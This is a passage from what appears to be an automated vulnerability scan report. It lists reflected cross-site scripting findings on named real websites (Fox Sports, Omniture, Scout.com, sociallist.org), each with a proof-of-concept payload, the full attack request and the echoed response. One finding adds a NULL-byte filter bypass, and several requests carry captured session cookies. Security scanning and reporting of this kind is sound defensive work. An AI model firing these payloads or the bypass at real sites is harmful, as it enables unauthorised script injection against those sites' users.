startComments('StoryComments', '5'); // load up team comments </script> ...[SNIP]...
1.153. http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://msn.foxsports.com
Path: /nfl/lists/Top_10_Super_Bowl_Heroes
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7fd'-alert(1)-'350d2cec32c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/lists/Top_10_Super_Bowl_Heroes?bb7fd'-alert(1)-'350d2cec32c=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226451
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Tue, 01 Feb 2011 15:36:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feba4'-alert(1)-'a1c1bd68b1d was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?gt1=39002feba4'-alert(1)-'a1c1bd68b1d HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252008
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Wed, 02 Feb 2011 15:37:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26544030'); // load up team comments </script> ...[SNIP]...
1.155. http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b9d2'-alert(1)-'f94768913cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248480
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Tue, 01 Feb 2011 15:36:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111?7b9d2'-alert(1)-'f94768913cf=1';
startComments('StoryComments', '26544030'); // load up team comments </script> ...[SNIP]...
1.156. http://msn.foxsports.com/nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a43a0'-alert(1)-'a64d4955fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/Police-watch-for-sex-trafficking-ahead-of-big-game-58165206?a43a0'-alert(1)-'a64d4955fc7=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253613
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26569115'); // load up team comments </script> ...[SNIP]...
1.157. http://msn.foxsports.com/nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ab0'-alert(1)-'e3786f32ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111?85ab0'-alert(1)-'e3786f32ad=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 258371
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=7
Date: Wed, 02 Feb 2011 15:37:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26541133'); // load up team comments </script> ...[SNIP]...
1.158. http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4410'-alert(1)-'23ffae24f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111?d4410'-alert(1)-'23ffae24f86=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 258524
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Wed, 02 Feb 2011 15:37:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
startComments('StoryComments', '26554000'); // load up team comments </script> ...[SNIP]...
1.159. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://my.omniture.com
Path: /login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a79"-alert(1)-"7f4bdae527e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the jpj request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a15"-alert(1)-"9e4c75fec7b was submitted in the jpj parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132c2a15"-alert(1)-"9e4c75fec7b HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:32:17 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www645
Content-Type: text/html
Connection: close
Content-Length: 27728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
1.161. https://my.omniture.com/p/suite/1.2/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://my.omniture.com
Path: /p/suite/1.2/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfe1"-alert(1)-"79f9f86c119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132&ebfe1"-alert(1)-"79f9f86c119=1 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:33:35 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www453
Content-Type: text/html
Connection: close
Content-Length: 27828
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the ssSession request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e86ee"-alert(1)-"66ebe3920b5 was submitted in the ssSession parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67e86ee"-alert(1)-"66ebe3920b5&jpj=95253754444132 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:31:44 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www460
Content-Type: text/html
Connection: close
Content-Length: 27586
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00412f4'-alert(1)-'956e390f61d was submitted in the c parameter. This input was echoed as 412f4'-alert(1)-'956e390f61d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:41:39 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 427 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Wed, 02 Feb 2011 15:51:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212188
<!-- An exception occurred. Described as: Incorrect syntax near '412'. The floating point value '956e390' is out of the range of computer representation (8 bytes).--><!DOCTYPE html PUBLIC "-// ...[SNIP]... <!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //--> ...[SNIP]...
1.164. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://recruiting.scout.com
Path: /a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21eb1'-alert(1)-'67613be4156 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a.z?s=73&p=9&c=4&pid=88&yr=2011&21eb1'-alert(1)-'67613be4156=1 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:42:45 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 367 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Wed, 02 Feb 2011 15:52:44 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Scout.com: Football Recruiting</title> <meta http-eq ...[SNIP]... <!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4&pid=88&21eb1'-alert(1)-'67613be4156=1&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //--> ...[SNIP]...
The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46054'-alert(1)-'3516148de48 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e7a8'-alert(1)-'8af0a80e42e was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ddb'-alert(1)-'75dd4dca154 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5be"><script>alert(1)</script>51b0587d24d was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage"> ...[SNIP]...
1.169. http://sociallist.org/submit.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sociallist.org
Path: /submit.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c92e7"><script>alert(1)</script>c161344b8ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1 HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 18868
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1"> ...[SNIP]...
The value of the tag request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94680"><script>alert(1)</script>385c4aafbf was submitted in the tag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19488
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage"> ...[SNIP]...
The value of the text request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf26"><script>alert(1)</script>4d8458ad73a was submitted in the text parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a"> ...[SNIP]...
The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5df9"><script>alert(1)</script>6ca859d5791 was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage"> ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae34"><script>alert(1)</script>c10119c2686 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage"> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a978a"><script>alert(1)</script>2b441ed7164 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
